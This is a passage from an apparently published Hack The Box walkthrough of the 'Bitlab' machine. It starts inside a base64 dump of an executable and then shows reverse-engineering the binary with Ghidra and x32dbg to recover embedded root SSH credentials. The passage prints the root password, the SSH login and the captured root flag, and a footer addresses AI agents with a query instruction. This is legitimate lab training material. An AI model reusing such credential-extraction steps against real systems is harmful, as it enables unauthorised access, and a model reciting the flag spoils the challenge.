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IAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAUAB1AFQAVABZAFwAcAB1AHQAdAB5AC4AZQB4AGUAAAAAAG8AcABlAG4AAAAAAEFjY2VzcyBEZW5pZWQgISEKAAAAc3RyaW5nIHRvbyBsb25nAGludmFsaWQgc3RyaW5nIHBvc2l0aW9uABAzQAAQEEAAiB5AAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABhAQACQM0AABwAAAAAAAAAAAAAAAAAAAABAQADcMkAAAAAAAAAAAAABAAAA7DJAAPQyQAAAAAAAAEBAAAAAAAAAAAAA/////wAAAABAAAAA3DJAAAAAAAAAAAAAAAAAAExAQAAkM0AAAAAAAAAAAAACAAAANDNAAHQzQABAM0AAAAAAADBAQAAAAAAAAAAAAP////8AAAAAQAAAAFwzQAAAAAAAAAAAAAEAAABsM0AAQDNAAAAAAABMQEAAAQAAAAAAAAD/////AAAAAEAAAAAkM0AAuSMAALgnAAD6JwAAICgAAFkoAACYKAAA4CgAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/v///wAAAADM////AAAAAP7///8AAAAALB9AAAAAAAD+////AAAAAND///8AAAAA/v///ykhQAA9IUAAAAAAAP7///8AAAAAzP///wAAAAD+////ASRAACokQAAAAAAA/v///wAAAADU////AAAAAP7///8AAAAAhyRAAAAAAAD+////AAAAANj///8AAAAA/v///2smQAB+JkAAAAAAADBAQAAAAAAA/////wAAAAAMAAAAjh5AAAAAAABMQEAAAAAAAP////8AAAAADAAAAFAeQAACAAAAeDRAAFw0QAAAAAAAABBAAAAAAACUNEAA/////7AnQAAiBZMZAQAAALA0QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAD/////4CdAAP/////oJ0AAAQAAAAAAAAABAAAAAAAAAP/////yJ0AAQAAAAAAAAAAAAAAAIh5AAAIAAAACAAAAAwAAAAEAAAAENUAAIgWTGQUAAADcNEAAAQAAABQ1QAAAAAAAAAAAAAAAAAABAAAA/////wAAAAD/////AAAAAAEAAAAAAAAAAQAAAAAAAABAAAAAAAAAAAAAAACXG0AAQAAAAAAAAAAAAAAAExtAAAIAAAACAAAAAwAAAAEAAABsNUAAAAAAAAAAAAADAAAAAQAAAHw1QAAiBZMZBAAAAEw1QAACAAAAjDVAAAAAAAAAAAAAAAAAAAEAAAD/////QChAACIFkxkBAAAA2DVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAP////+AKEAAAAAAAIgoQAABAAAAkChAACIFkxkDAAAABDZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAP/////AKEAAAAAAAMgoQAABAAAA0ChAAAEAAADYKEAAIgWTGQQAAABANkAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAA/DYAAAAAAAAAAAAAHDgAAAAwAAAEOAAAAAAAAAAAAAA6OAAACDEAAEg3AAAAAAAAAAAAACo6AABMMAAAcDcAAAAAAAAAAAAA9DoAAHQwAAAENwAAAAAAAAAAAADePQAACDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADDgAAAAAAADEPQAArj0AAJg9AACIPQAAbj0AAFo9AAA8PQAAID0AAAw9AAD4PAAA4jwAAMQ8AAC8PAAApjwAAJY8AACGPAAAAAAAAII4AACiOAAAwjgAAOQ4AAAqOQAAaDkAAKg5AADqOQAARjgAAAAAAABKOwAAVDsAAFw7AABqOwAAcjsAAH47AACKOwAALDsAAK47AADCOwAAzjsAANg7AADqOwAAADwAABo8AAAuPAAAZDwAAHY8AAAiOwAAGjsAAAw7AAACOwAA5DoAANQ6AADKOgAAwDoAALY6AACUOgAAdDoAAFg6AAA4OgAAmDsAAOw9AAACPgAAOjsAAAw+AAAAAAAAKjgAAAAAAABlAUdldFVzZXJOYW1lVwAAQURWQVBJMzIuZGxsAAAiAVNoZWxsRXhlY3V0ZVcAU0hFTEwzMi5kbGwApwI/Y291dEBzdGRAQDNWPyRiYXNpY19vc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQDFAQQAAjgI/X1hvdXRfb2ZfcmFuZ2VAc3RkQEBZQVhQQkRAWgCMAj9fWGxlbmd0aF9lcnJvckBzdGRAQFlBWFBCREBaAA0GP3VuY2F1Z2h0X2V4Y2VwdGlvbkBzdGRAQFlBX05YWgDIBT9zcHV0bkA/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRV9KUEJEX0pAWgAAUwI/X09zZnhAPyRiYXNpY19vc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFWFhaAADFBT9zcHV0Y0A/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRUhEQFoAkQM/Zmx1c2hAPyRiYXNpY19vc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFQUFWMTJAWFoAnAU/c2V0c3RhdGVAPyRiYXNpY19pb3NARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVYSF9OQFoAAE1TVkNQMTAwLmRsbAAADQE/d2hhdEBleGNlcHRpb25Ac3RkQEBVQkVQQkRYWgBdAD8/MWV4Y2VwdGlvbkBzdGRAQFVBRUBYWgAAIgA/PzBleGNlcHRpb25Ac3RkQEBRQUVAQUJRQkRAWgAkAD8/MGV4Y2VwdGlvbkBzdGRAQFFBRUBBQlYwMUBAWgAA0QVtZW1tb3ZlAM0FbWVtY2hyAACiBWlzYWxudW0AZQA/PzNAWUFYUEFYQFoAAGMAPz8yQFlBUEFYSUBaAABNU1ZDUjEwMC5kbGwAAI0EX3VubG9jawBbAV9fZGxsb25leGl0ACMDX2xvY2sAyQNfb25leGl0AMUBX2Ftc2dfZXhpdAAAYwFfX2dldG1haW5hcmdzANwBX2NleGl0AAAqAl9leGl0AC0BX1hjcHRGaWx0ZXIAcwVleGl0AABkAV9faW5pdGVudgCwAl9pbml0dGVybQCxAl9pbml0dGVybV9lAOwBX2NvbmZpZ3RocmVhZGxvY2FsZQCiAV9fc2V0dXNlcm1hdGhlcnIAAOsBX2NvbW1vZGUAAEUCX2Ztb2RlAACfAV9fc2V0X2FwcF90eXBlAAD7AV9jcnRfZGVidWdnZXJfaG9vawAAIQJfZXhjZXB0X2hhbmRsZXI0X2NvbW1vbgACAT90ZXJtaW5hdGVAQFlBWFhaAO4AP190eXBlX2luZm9fZHRvcl9pbnRlcm5hbF9tZXRob2RAdHlwZV9pbmZvQEBRQUVYWFoAALgCX2ludm9rZV93YXRzb24AAO8BX2Nvbn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" | base64 -d > RemoteConnection.exe
```

{% endcode %}

If you use md5sum in both files, and the result is the same (same hash), is the same .exe file and you did the process well.

Now from our local terminal, we will analyze the executable.

{% code title="Local Terminal" %}

```bash
# This is to check, what files reads and if is dangerous or not
strings RemoteConnection.exe
```

{% endcode %}

{% code title="Local Terminal" %}

```bash
# write 'aaaa' and then 'afl', same goal as before
radare2 RemoteConnection.exe
```

{% endcode %}

To continue the scanning of the executable file, we are going to use GHidra

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F0uw0YniWi3NDW00bEozA%2Fimage.png?alt=media&#x26;token=98720186-7943-40be-8b06-100995cb9902" alt=""><figcaption></figcaption></figure>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FyqmiKG8a8gnfiibp7YM9%2Fimage.png?alt=media&#x26;token=3e8a4449-1781-4602-9603-ee1c1e210dd0" alt=""><figcaption><p>Move to file to the dragon.</p></figcaption></figure>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FJVsXaN6ALQMlDEcLi4ry%2Fimage.png?alt=media&#x26;token=1973ba15-87af-4880-943c-986699020a33" alt=""><figcaption></figcaption></figure>

Here, the best option to analyze the file, is seeing every function inside the folder F.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FnBmin71Z8P1iV2YFRBiF%2Fimage.png?alt=media&#x26;token=d5f7efdb-5da1-400d-baa9-75fd177c1ca6" alt=""><figcaption></figcaption></figure>

Here there is something about Putty.exe, a ssh remote connection software. And something about "ipParameters," is probably that the credentials are here. To extract it we are going to use a debugger like **x32dbg**.

\-       x32dbg:           Load the file

\-       x32dbg:           Right Click > Search for > All Modules > String References

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FKdAXuS4juY9Ruecqywpc%2Fimage.png?alt=media&#x26;token=40e1af2e-4f42-4fdb-a5bb-6826d1d5a7dc" alt=""><figcaption></figcaption></figure>

\-       x32dbg:           Search for "Clave", because of what we found at the code. And double click at the remoteconnection row.

\-       x32dbg:           Press F2 in the row 00C01647 to stop the executable file until that point.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FxuS5KtJdUQbKUPbuwBtT%2Fimage.png?alt=media&#x26;token=f6bd375a-8426-4ec7-9cdc-b721ebc7ed58" alt=""><figcaption><p>You can see the credentials in the right panel.</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
ssh root@10.129.11.47  # Qf7]8YSV.wDNF*[7d?j&eD4^
```

{% endcode %}

{% code title="Target Terminal \[Root]" %}

```bash
root@bitlab:~# cat /root/root.txt
cfc2d02e761b8e33b17da0e571d3ceb3
```

{% endcode %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://robertos-notebook.gitbook.io/cybersecurity/hack-the-box/old-machines/medium-machine/bitlab.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.